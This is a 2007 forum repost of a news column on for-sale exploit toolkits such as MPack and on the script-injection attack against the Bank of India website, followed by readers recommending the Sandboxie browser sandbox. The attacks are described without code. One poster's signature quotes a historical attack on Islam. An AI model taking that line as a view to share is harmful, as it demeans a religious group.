"Without any computer science skill or any security background, you can install this package on any Web server and start to infect people with malicious code," says Ben-Itzhak. 
Posted on 09/11/2007 8:20:11 AM PDT by ShadowAce
For a few hours late last week, visitors to the Bank of India Web site had their browsers covertly redirected to a site hosting malicious exploits. Increasingly, criminals, often without any technical experience, are defacing popular Web sites with code that allows them to direct your browser to download content without you even knowing. Finjan, a security company that's been on the cutting edge of detecting Web 2.0 malware, identifies 10 toolkits for sale on the Internet, up from earlier this year. If you are an online criminal these days, says Yuval Ben-Itzhak, CTO of Finjan, "you are buying a software package from hackers. Without any computer science skill or any security background, you can install this package on any Web server and start to infect people with malicious code." As long as the thieves are making money, there appears to be no sign of stopping this current rise in crimeware.
The Bank of India
A few weeks ago, I wrote about the process: criminals inject JavaScript onto a live Web page; if the site is vulnerable to script injection attacks, the code (often an iFrame) gets added to the Web site. The site's administrators have no idea that their visitors are becoming infected with whatever code the criminals want to install--Trojans usually, sometimes bots. That's what happened to the Bank of India Web site. To see a real-time video capture of what happened to the Bank of India site, watch this video.
Roger Thompson, whose company, Exploit Prevention Labs, makes LinkScanner prevention software, offers his account of what happened. Thompson says there were multiple exploits used in the Bank of India attack. "One was a simple MS06-042, which was essentially cut and pasted from the original Milw0rm proof of concept. The second exploit set was an as-yet-unidentified exploit package, along the lines of MPack / IcePack / WebAttacker. The real difference, however, is that it had machine-generated variable and function names. In other words, the server-side script was generating the scripts in order to try to defeat scanners."
|
"Without any computer science skill or any security background, you can install this package on any Web server and start to infect people with malicious code," says Ben-Itzhak. |
|
|
Who's responsible?
Who's responsible for creating these malicious code toolkits? Finjan's Ben-Itzhak says, "we see different groups creating them. We realize that the MPack group and the WebAttacker group are two different groups. We also believe the IcePack and Neosploit and MultiExploit toolkits are different groups, each using a different set of exploits." In July 2007, SecurityFocus editor Robert Lemos spoke with one of the members of Dream Coders Team, the party believed to be responsible for MPack. "We are just a group of people working together but doing some illegal business," he said. He also denied any contact with real-world Russian criminals.
The hacker said the Dream Coders Team (DCT) consists of three people, plus a few freelancers. The developers are all Russian, while the others are from various countries. DCT said that all the recent publicity has drawn the attention of law enforcement. "In Russia, there is a law which forbids (malicious software) creation tools like MPack, (but) we secure our systems to the best possible extent, so that even a police officer would not be able to get the PCs analyzed," said DCT. Despite these precautions, he said that "we will have to shut down the project soon."
More not less
That doesn't appear to be happening. If anything, MPack still tops Finjan's list of the most popular toolkits available today. In addition are WebAttacker and WebAttacker II, Icepack, NeoSploit, MultiExploit. "However," Ben-Itzhak says, "we see additional ones that are less known, less popular, but they are out there. They're using different techniques from the big ones and we name them in our report."
| "With Flash and WinZip you'll see them on almost any desktop around the world today. So that's the reason the hackers are interested in these exploits," says Ben-Itzhak. |
|
|
|
Few zero days included with these kits
Fortunately, zero-day exploits, attacks on previously unannounced software flaws, are rare within these crimeware toolkits, says Ben-Itzhak. "Usually we'll find zero-day attacks on third-party applications rather than Microsoft operating systems. So, you'll often find zero-day attacks relating to WinZip and Adobe Flash Player, because people usually are not updating them." That's because older versions did not include automatic updates; if you didn't know to update, you remain vulnerable.
He says "Flash and WinZip are the most popular ones--but we see some others such as CD content burners, some editing tools--but these are less popular applications. With Flash and WinZip you'll see them on almost any desktop around the world today. So that's the reason the hackers are interested in these exploits."
What can be done?
Both Finjan and Exploit Prevention Labs offer free safe surfing tools. I like Finjan SecureBrowsing and Linkscanner because they actively scan the pages loading into your Internet browser. That way if someone has injected malicious code onto, say, a trusted page, these products will alert you.
McAfee SiteAdvisor continues to disappoint me. It uses a white-list database, so if the site has already been checked and declared clean, you'll see that trusted green symbol even if the site was compromised just five minutes ago. Given that so much on the Internet changes within an instant, I fail to see how SiteAdvisor can promise to protect against these kinds of attacks. On the other hand, SiteAdvisor is effective against phishing sites, something that Finjan and Exploit Preventions Labs don't do well.
"Show me just what Mohammed brought that was new, and there you will find things only evil and inhuman, such as his command to spread by the sword the faith he preached." - Manuel II Palelologus
This is one of the "New Toys" I've been using ... always browse with it now ... check it out I think you will like ...
Sandboxie intercepts changes to both your files and registry settings, making it virtually impossible for any software to reach outside the sandbox.
Sandboxie traps cached browser items into the sandbox as a by-product of normal operation, so when you throw away the sandbox, all the history records and other side-effects of your browsing disappear as well.
everything is trapped in the sandbox -- malware/spyware/trojans/bots etc ... when you are done with a session just delete the sandbox ...
best of all Free and easy to use ...
Sandboxie definitely looks like a good solution for Windows users. While it wouldn’t be of any use to me, I heartily recommend Windows users to protect themselves. If this stuff gets blocked effectively enough, then (hopefully) the attempts will also decline, and that is good for all of us.
Great article, ShadowAce, thanks.
I liked his debug utilities, what are they, do you know?
I agree...
I run both Windows and Linux...
but unfortunatey I have a bit of a poker habit as well as some online gaming theat is still windows only ... (WINE don’t cut it sometimes) ...
but Sandboxie is fantastic, for windows users...
“best of all Free and easy to use ...”
On download dotcom it is listed as a 30 day trial not free, is that correct?
"You may use Sandboxie free of charge for any length of time that you desire. However, if you use Sandboxie for more than 30 days, the software will occasionally remind you to consider paying the registration fee. By doing that, you would show your support for further development and improvement of Sandboxie.
By paying the registration fee of $25 US-dollars you get a life-time registration key to this and and all upcoming versions of the Sandboxie product. You also get to use a few of the features of Sandboxie that are reserved for paying users.
Please bear in mind that this is currently a privately-operated endeavor, and registering Sandboxie does not guarantee you any level of technical support. You may, of course, always post your experiences with Sandboxie on the web forums or by e-mail, and I will do my very best to provide satisfactory answers and solutions to problems."
The "reminders" are quite infrequent... once upon launc every week or so and do not interfere w/ operation at all ...
Thanks, I’ll download it.
Thanks for the info....bumping for later reference
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.